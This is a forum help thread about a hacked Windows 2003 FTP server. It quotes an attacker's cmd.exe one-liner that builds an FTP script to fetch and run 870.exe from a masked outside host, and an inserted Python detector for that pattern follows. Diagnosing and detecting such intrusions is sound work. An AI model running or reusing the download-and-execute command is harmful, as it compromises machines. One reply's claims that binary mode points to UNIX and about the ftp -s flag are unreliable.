Solved

FTP server - possible virus/backdoor/trojan?

Posted on 2006-11-30
856 Views
Last Modified: 2013-12-04
I have a standard fully patched Windows 2003 Server running as an FTP server. I have done a full virus and spyware scan, but every so often I log in via VNC and there will be a command prompt open with the following text:


Could Not Find C:\Documents and Settings\Administrator\i
ftp> open xx.xx.xxx.xxx 4235
Connected to xx.xx.xxx.xxx.
220 Reptile welcomes you..
ftp> user 1 1
331 Password required
230 User logged in.
ftp> get 532.exe
200 PORT command successful.
150 Opening BINARY mode data connection


This is VERY worrying - and I can't find a lot of info about it - I admit my IIS installation may not be very secure - can someone advise me on this issue?
Question by:STEVEO5
LVL 11

Expert Comment

by:Kruno Džoić
ID: 18053290
Open services.msc and check for services with the letters "ftp" in their name or any strange services (use Google to identify services).

Author Comment

by:STEVEO5
ID: 18053506
Had a look - couldn't find anything strange - although I noticed this command in the Start > Run dialogue and I didn't type it - any ideas?


cmd.exe /c del i&echo open xx.xx.xxx.xxx 6745 > i&echo user 1 1 >> i &echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit
LVL 12

Expert Comment

by:Phil_Agcaoili
ID: 18060208
Do you have a firewall in front of this server?
If not, you NEED a fw.
If so, what do the logs say that is going on to/from this FTP server?

I bet someone has compromised your system and is uploading/downloading to/from it based on what you see.

I would:
- Remove this server from the network
- Rebuild this FTP server, patch it and follow an Internet server hardening guide
- Install a network fw in front of it and limit access to the rebuilt FTP server
- Monitor network activity just in case other systems have been compromised

LVL 9

Expert Comment

by:maninblac1
ID: 18062963
Well, it's difficult for me to tell you exactly what's going on, but it sure looks like a hack.

But the thing I can tell you is that it's likely the hacker is coming from a computer that is running UNIX.

UNIX (and maybe Linux as well, I'm not 100% sure) ftp requires the connection to enter "BINARY mode" to transfer data. That was a big tip-off to me: your server is 2003 and yet it is in binary mode, something odd for a Windows box to my knowledge.

Is this an FTP server with logon required? If so, doesn't Windows transmit FTP user/passwords in plain text, so a packet sniffer could have sniffed out a login and is now accessing your FTP?

Check your logs for connections and the users who connected; you may find your answers there.

In fact, either this is a script, or it's definitely a hack. The command flags indicate suspicious behaviour: running the command then closing the prompt ("cmd.exe /c"), then he gets a file 870.exe off of a remote server. Then he does "ftp -n -s", which suppresses the login and runs the executable with the -s command, then exits the command.

I'd say look for the file 870.exe, but it appears that he deletes it before he leaves. I'd beef up security definitely.
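As an added defender-side example (not code from the original thread), the following Python detector looks for the pattern maninblac1 describes above in process-creation command lines: a cmd.exe chain that writes an FTP script with echo redirects, runs it with ftp -s:, and then launches the file it fetched. The sample command lines and the host 198.51.100.7 are constructed for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample command lines (placeholder host); the first mirrors the
# shape of the command quoted in the thread, the other two are benign.
SAMPLE_CMDLINES = [
    "cmd.exe /c del i&echo open 198.51.100.7 6745 > i&echo user 1 1 >> i "
    "&echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit",
    "ftp -s:C:\\jobs\\nightly.txt ftp.example.internal",
    "cmd.exe /c dir C:\\inetpub\\ftproot",
]

FTP_SCRIPT = re.compile(r'\bftp(?:\.exe)?\b[^&|]*?-s:("[^"]+"|\S+)', re.I)
ECHO_WRITE = re.compile(r"^echo\s+(.+?)\s*>>?\s*(\S+)$", re.I)

@dataclass
class Finding:
    script_file: str                              # file passed to ftp -s:
    host: Optional[str] = None
    port: Optional[str] = None
    fetched: list = field(default_factory=list)   # files pulled with "get"
    executed: list = field(default_factory=list)  # fetched files later launched

    @property
    def severity(self) -> str:
        # get + run of the same file is the download-and-execute chain seen above.
        if self.executed:
            return "high"
        return "medium" if self.fetched else "low"

def analyze(cmdline: str) -> Optional[Finding]:
    """Return a Finding for command lines that drive ftp.exe with a -s: script."""
    m = FTP_SCRIPT.search(cmdline)
    if not m:
        return None
    finding = Finding(script_file=m.group(1).strip('"'))
    for seg in (s.strip() for s in re.split(r"&&|\|\||[&|]", cmdline)):  # cmd.exe chain
        w = ECHO_WRITE.match(seg)
        if w and w.group(2).strip('"').lower() == finding.script_file.lower():
            verb, *args = w.group(1).split() or [""]   # FTP command echoed into the script
            if verb.lower() == "open" and args:
                finding.host, finding.port = args[0], (args[1] if len(args) > 1 else "21")
            elif verb.lower() in ("get", "mget") and args:
                finding.fetched.append(args[0])
        else:
            tokens = seg.split()   # any other segment: was a fetched file launched?
            if tokens and tokens[0].strip('"').lower() in [f.lower() for f in finding.fetched]:
                finding.executed.append(tokens[0].strip('"'))
    return finding
```

A "low" finding (a -s: script the command line never writes itself) is usually a scheduled admin transfer; "high" is the full fetch-and-run chain and is worth an immediate look at the host.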

Author Comment

by:STEVEO5
ID: 18066971
Server is behind a router/firewall.

Can you advise on a server hardening guide?

My FTP server doesn't require authentication - however SOME virtual directories restrict access by only allowing PCs on the local subnet
LVL 12

Accepted Solution

by:
Phil_Agcaoili earned 2000 total points
ID: 18074621
Follow the 2003 server hardening guides here: http://support.microsoft.com/default.aspx/kb/885409

Ok, did you verify that the firewall is only allowing access to the FTP service on this server?
If not, you need to scan your server from the Net and verify that you're only serving FTP.

This was troubling and also part of why you were just hacked:
"My FTP server doesn't require authentication - however SOME virtual directories restrict access by only allowing PCs on the local subnet"

Anything on a network and especially something connected to the Internet requires authentication.

Anonymous access to FTP is somewhat fine these days, but access to virtual directories should always be authenticated.
LVL 1

Expert Comment

by:Computer101
ID: 21101050
Forced accept.

Computer101
EE Admin